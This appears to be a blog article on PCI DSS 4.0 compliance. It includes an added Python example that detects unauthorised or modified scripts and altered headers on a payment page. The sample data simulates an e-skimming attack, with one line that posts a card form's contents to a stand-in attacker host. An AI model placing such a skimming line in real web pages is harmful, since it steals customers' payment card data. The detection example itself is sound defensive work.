Are you PCI compliant yet?

Lynn Marks | 03/13/2025

We are merely days away from the March 31, 2025 deadline, after which the future-dated requirements of PCI DSS 4.0 become mandatory. While it is a welcome move toward a more secure future, the transition from PCI DSS 3.2.1 to 4.0 is a heavy lift for many businesses: it brings a more formalized, targeted risk analysis, a set of new security requirements and tighter controls on how payment data is protected, and it sits alongside the data protection and privacy laws that already govern that data, all with the aim of reducing payment card fraud.

Compliance is mandatory for financial institutions, online payment processors, merchants that accept payment cards, any organization that stores, processes or transmits payment card data, and any service provider that supports any part of the card processing ecosystem. In short, this covers nearly every business that takes card payments.

The importance of compliance to security

For those asking how much compliance actually matters to security, findings from the 2024 Thales Data Threat Report suggest the answer is “a great deal.” The report finds that 93 percent of professionals believe security threats are increasing in volume or severity. Even so, 43 percent of enterprises failed a compliance audit in the past 12 months, and 31 percent of those suffered a data breach in the same year, compared with just 3 percent of those that passed their audits.

In addition, compliance with security standards adds a layer of trust for consumers. Just as customers would not feel comfortable if a shop kept their card details on a sticky note, PCI DSS requires businesses to treat payment data with care: rendering it unreadable when stored, encrypting it when it crosses open networks, and keeping it out of reach of anyone who should not have access to it. So, every time a customer buys something, PCI DSS is working behind the scenes to keep their financial information safe from digital “break-ins.”

On to the main question: Are you PCI compliant? For that, let’s first understand what it means to be 4.0 compliant.

Requirements for PCI DSS 4.0

PCI DSS 4.0 updates 3.2.1 with new requirements relating to multi-factor authentication (MFA), passwords, e-commerce and security awareness. These include:

  • An expansion of Requirement 8 to implement MFA for all access into the cardholder data environment, not only for administrative access.
  • Updated password requirements, including an increase in the minimum password length from 8 characters to 12 (or 8 where a system does not support 12), with passwords changed at least every 12 months or when compromise is suspected unless another access-control method such as MFA is in use.
  • Changed requirements around shared, group and generic accounts, which are now prohibited unless needed by exception, with each use justified, documented and attributable to an individual.
  • Clearly defined roles and responsibilities, documented and assigned, for each of the 12 requirements.
  • New requirements to detect and prevent threats against the payment industry, including anti-phishing mechanisms (Requirement 5.4.1), management of every script that loads and executes on a payment page (Requirement 6.4.3) and change- and tamper-detection for payment page scripts and HTTP headers to counter e-skimming (Requirement 11.6.1).
  • Updated terminology from “firewalls” to “network security controls” to cover the broader range of technologies now used to meet the security objectives traditionally met by firewalls.
  • Enhanced PCI DSS assessment reports and the option for organizations to complete partial assessments.
  • Greater flexibility, through the Customized Approach and targeted risk analyses, for organizations to define how frequently they perform certain activities and to demonstrate how they meet security objectives with methods suited to their business needs.
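
The e-skimming requirements above describe a technique rather than a policy: keep an inventory of every script authorized to run on a payment page, and periodically check the served page for scripts that are unauthorized, modified or missing, along with the HTTP headers that govern them. The following Python is an added example of such a check and is not code from the article or from the PCI SSC. The inventory, page, URLs, script bodies and header values are all constructed for illustration, and the `fetch` dictionary stands in for an HTTP client so the example runs offline.

```python
"""Change- and tamper-detection for a payment page's scripts and headers.

Added illustration of the intent behind PCI DSS v4.0 Requirements 6.4.3 and
11.6.1; not the article's code. Every URL, script body and header value is a
constructed sample.
"""
import hashlib
import re

# <script ...>body</script>, tolerant of attributes and multi-line bodies.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Negative look-behind keeps data-src / data-id attributes from matching.
SRC_RE = re.compile(r"""(?<![\w-])src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
ID_RE = re.compile(r"""(?<![\w-])id\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def sha256_hex(text: str) -> str:
    """Hex SHA-256 of a script body; the inventory stores these for approved versions."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def extract_scripts(html: str, fetch: dict) -> dict:
    """Map every script on the page to its content.

    External scripts are keyed by their src URL and resolved through `fetch`
    (a dict simulating an HTTP client; None means the body could not be
    retrieved). Inline scripts are keyed by their id attribute, falling back
    to inline#N in document order when the page author gave them no id.
    """
    scripts, n_inline = {}, 0
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:
            scripts[src.group(1)] = fetch.get(src.group(1))
            continue
        n_inline += 1
        id_attr = ID_RE.search(attrs)
        scripts[id_attr.group(1) if id_attr else f"inline#{n_inline}"] = body.strip()
    return scripts


def check_payment_page(html: str, inventory: dict, fetch: dict) -> dict:
    """Compare the served page against the approved inventory.

    Returns {script_key: verdict} with verdicts ok, modified, unauthorized,
    unresolved (fetch failed) and missing (approved script no longer present).
    """
    found = extract_scripts(html, fetch)
    report = {}
    for key, content in found.items():
        if key not in inventory:
            report[key] = "unauthorized"        # not in the 6.4.3 inventory
        elif content is None:
            report[key] = "unresolved"          # cannot verify integrity
        elif sha256_hex(content) != inventory[key]:
            report[key] = "modified"            # content changed since approval
        else:
            report[key] = "ok"
    for key in inventory:
        report.setdefault(key, "missing")       # approved script has disappeared
    return report


def check_headers(observed: dict, expected: dict) -> dict:
    """Compare response headers (names compared case-insensitively) to expected values."""
    obs = {k.lower(): v for k, v in observed.items()}
    report = {}
    for name, value in expected.items():
        if name.lower() not in obs:
            report[name] = "missing"
        elif obs[name.lower()] != value:
            report[name] = "modified"
        else:
            report[name] = "ok"
    return report


# Constructed sample data: the approved scripts and the inventory built from them.
CHECKOUT_URL = "https://shop.example/static/checkout.js"
SKIMMER_URL = "https://cdn.evil-example.net/s.js"
APPROVED_CHECKOUT_JS = "function pay(form){ return postToken(form); }"
APPROVED_TAG_JS = "window.analytics = window.analytics || [];"
INVENTORY = {CHECKOUT_URL: sha256_hex(APPROVED_CHECKOUT_JS),
             "tag-loader": sha256_hex(APPROVED_TAG_JS)}
EXPECTED_HEADERS = {"Content-Security-Policy": "script-src 'self'"}

# Constructed page as served after a hypothetical compromise: an injected third-party
# script, and the approved checkout.js now exfiltrates the card form.
SAMPLE_PAGE = f"""<html><head>
<script id="tag-loader">{APPROVED_TAG_JS}</script>
<script src="{CHECKOUT_URL}"></script>
<script src="{SKIMMER_URL}"></script>
</head><body><form id="card"><input name="pan"></form></body></html>"""
FETCHED = {CHECKOUT_URL: APPROVED_CHECKOUT_JS
           + "fetch('https://cdn.evil-example.net/c',{method:'POST',body:new FormData(card)});",
           SKIMMER_URL: "/* skimmer */"}
OBSERVED_HEADERS = {"content-security-policy": "script-src 'self' https://cdn.evil-example.net"}

if __name__ == "__main__":
    for key, verdict in check_payment_page(SAMPLE_PAGE, INVENTORY, FETCHED).items():
        print(f"{verdict:12s} {key}")
    for name, verdict in check_headers(OBSERVED_HEADERS, EXPECTED_HEADERS).items():
        print(f"{verdict:12s} {name}")
```

Run against the constructed page, the check reports the inline tag loader as ok, `checkout.js` as modified, the injected `s.js` as unauthorized and the weakened Content-Security-Policy as modified. In production the same logic would run against the page as a customer's browser receives it (including server-side headers), on the schedule Requirement 11.6.1 sets or one justified by a targeted risk analysis, and any verdict other than ok would raise an alert. Keying inline scripts by position is fragile when an attacker inserts a script ahead of an approved one, which is why the example prefers an `id` attribute; Subresource Integrity attributes on the `<script>` tags are a complementary browser-side control.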

The technical complexity of these requirements has posed a significant challenge for organizations. Merchants are expected to meet a set of criteria that is new to them, and in several cases new to the industry. There are many changes, transitions and objectives, and businesses that fail to meet them face compliance delays and hefty fines. The good news is that, with the mandate in force, more PCI-validated service providers will be available to work with, which can reduce the burden of meeting compliance obligations.

Achieving PCI DSS 4.0 compliance

With the deadline fast approaching, businesses that haven’t already met the requirements should take the following steps to prepare for PCI DSS 4.0 compliance:

  1. Run a gap assessment: Review existing security measures against the 4.0 requirements to identify gaps that need closing. This includes evaluating third-party tools and vendors for compliance.
  2. Update relevant policies and practices: Ensure company systems support longer passwords and MFA, and maintain encryption of sensitive data at rest and in transit. It is also important to set up automated log monitoring that flags threats or anomalies, rather than relying on manual log review.
  3. Begin implementation immediately: Once the basics align, companies need to prioritize implementing the rules and practices required for compliance in order to meet the deadline.
  4. Prepare company employees: Everyone in the organization should be looped into the compliance requirements and given a thorough understanding of their scope, particularly regarding third-party scripts on payment pages. Where specific technical expertise is needed, secure a trusted partner internally or externally.
  5. Schedule regular reviews: Set up the recurring activities the standard calls for, such as quarterly vulnerability scans and annual penetration tests, and review hardware and software security controls on that cadence to catch vulnerabilities early.

Failure to comply can result in penalties, including fines commonly cited as ranging from US $5,000 to $100,000 per month, increased audit requirements and a potential suspension of card processing by the merchant bank or card brand. These penalties depend on transaction volume, the PCI compliance level the merchant or service provider falls under and how long it has been non-compliant.

As the countdown to the deadline continues, adapting to these changes can feel overwhelming. Organizations that follow the steps above, however, will be better positioned to meet the compliance deadline and to raise their security posture ahead of the new and growing threats that 2025 will likely bring.
